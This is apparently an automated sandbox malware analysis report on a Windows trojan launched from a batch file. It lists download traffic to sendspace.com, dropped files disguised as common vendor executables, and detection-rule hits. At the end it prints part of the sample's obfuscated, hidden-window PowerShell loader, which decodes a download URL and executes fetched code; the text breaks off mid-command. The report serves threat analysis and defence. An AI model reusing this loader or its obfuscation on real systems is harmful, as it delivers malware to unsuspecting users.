              Source: global trafficHTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n4.sendspace.comConnection: Keep-AliveCookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n2.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n4.sendspace.com
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: powershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: java.exe0.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fs03n2.sendspace.com
              Source: wab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://ocsp.digicert.com0
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: Au3Info_x64.exe.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/
              Source: Au3Info_x64.exe.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
              Source: AutoIt3_x64.exe.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sendspace.com
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
              Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspaX
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6917000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
              Source: wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspace.com/
              Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ
              Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi
              Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
              Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: AutoIt3Help.exe.8.drString found in binary or memory: https://www.autoitscript.com/site/autoit/8
              Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com
              Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/
              Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2389809411.0000000021530000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/g1h76h
              Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/g1h76hMU
              Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsP
              Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsXRwl
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_7844.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Very long command line found
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6465
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6489
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6465Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6489Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AAB162_2_00007FFD9B8AAB16
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8AB8C22_2_00007FFD9B8AB8C2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A0D352_2_00007FFD9B8A0D35
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
              Source: AppVDllSurrogate.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: officeappguardwin32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: officeappguardwin32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: OfficeScrSanBroker.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: AppVLP.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Integrator.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: MpCmdRun.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: MpDlpCmd.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: VC_redist.x64.exe.8.drStatic PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
              Source: integrator.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: UcMapi.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Au3Check.exe.8.drStatic PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
              Source: Aut2exe.exe.8.drStatic PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
              Source: Aut2exe_x64.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: upx.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: ai.exe0.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
              Source: OLicenseHeartbeat.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: SciTE.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: Uninstall.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: AdobeARMHelper.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jaureg.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: jucheck.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jucheck.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: jusched.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: jusched.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: grv_icons.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: java.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM)
              Source: javaw.exe.8.drStatic PE information: Resource name: RT_ICON type: DitPack archive data
              Source: javaws.exe.8.drStatic PE information: Resource name: RT_ICON type: COM executable for DOS
              Source: GoogleCrashHandler.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (block device driver)
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Resource name: RT_ICON type: Aarch64 COFF executable, not stripped, 66 sections, symbol offset=0x42aa70, 181 symbols, optional header size 43644, created Thu Jan 1 00:03:22 1970
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: pubs.exe.8.drStatic PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
              Source: OcPubMgr.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
              Source: PerfBoost.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: MpCmdRun.exe0.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: misc.exe.8.drStatic PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\200"
              Source: misc.exe.8.drStatic PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
              Source: pj11icon.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_MSB_FIRST
              Source: SQLDumper.exe.8.drStatic PE information: Data appended to the last section found
              Source: AdobeARMHelper.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController64.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateCore.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate.exe.8.drStatic PE information: Data appended to the last section found
              Source: dbcicons.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate64.exe.8.drStatic PE information: Data appended to the last section found
              Source: osmclienticon.exe.8.drStatic PE information: Data appended to the last section found
              Source: msoev.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdate.exe.8.drStatic PE information: Data appended to the last section found
              Source: javaw.exe.8.drStatic PE information: Data appended to the last section found
              Source: MsMpEng.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Info.exe.8.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateBroker.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Info_x64.exe.8.drStatic PE information: Data appended to the last section found
              Source: PerfBoost.exe.8.drStatic PE information: Data appended to the last section found
              Source: javaws.exe.8.drStatic PE information: Data appended to the last section found
              Source: aimgr.exe0.8.drStatic PE information: Data appended to the last section found
              Source: Common.DBConnection.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateOnDemand.exe.8.drStatic PE information: Data appended to the last section found
              Source: SDXHelper.exe.8.drStatic PE information: Data appended to the last section found
              Source: upx.exe.8.drStatic PE information: Data appended to the last section found
              Source: Au3Check.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler.exe.8.drStatic PE information: Data appended to the last section found
              Source: sscicons.exe.8.drStatic PE information: Data appended to the last section found
              Source: armsvc.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVLP.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleCrashHandler64.exe.8.drStatic PE information: Data appended to the last section found
              Source: Microsoft.Mashup.Container.Loader.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppSharingHookController.exe.8.drStatic PE information: Data appended to the last section found
              Source: AutoIt3Help.exe.8.drStatic PE information: Data appended to the last section found
              Source: Uninstall.exe.8.drStatic PE information: Data appended to the last section found
              Source: AppVDllSurrogate32.exe.8.drStatic PE information: Data appended to the last section found
              Source: Wordconv.exe.8.drStatic PE information: Data appended to the last section found
              Source: chrome.exe.8.drStatic PE information: Data appended to the last section found
              Source: VSTOInstaller.exe.8.drStatic PE information: Data appended to the last section found
              Source: MpDlpCmd.exe.8.drStatic PE information: Data appended to the last section found
              Source: java.exe.8.drStatic PE information: Data appended to the last section found
              Source: MpCopyAccelerator.exe.8.drStatic PE information: Data appended to the last section found
              Source: ConfigSecurityPolicy.exe.8.drStatic PE information: Data appended to the last section found
              Source: grv_icons.exe.8.drStatic PE information: Data appended to the last section found
              Source: GoogleUpdateComRegisterShell64.exe.8.drStatic PE information: Data appended to the last section found
              Source: amsi32_7844.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: VC_redist.x64.exe.8.drStatic PE information: Section: .reloc ZLIB complexity 1.0107421875
              Source: classification engineClassification label: mal100.spre.troj.evad.winCMD@14/164@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Fettle.HanJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7596
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp 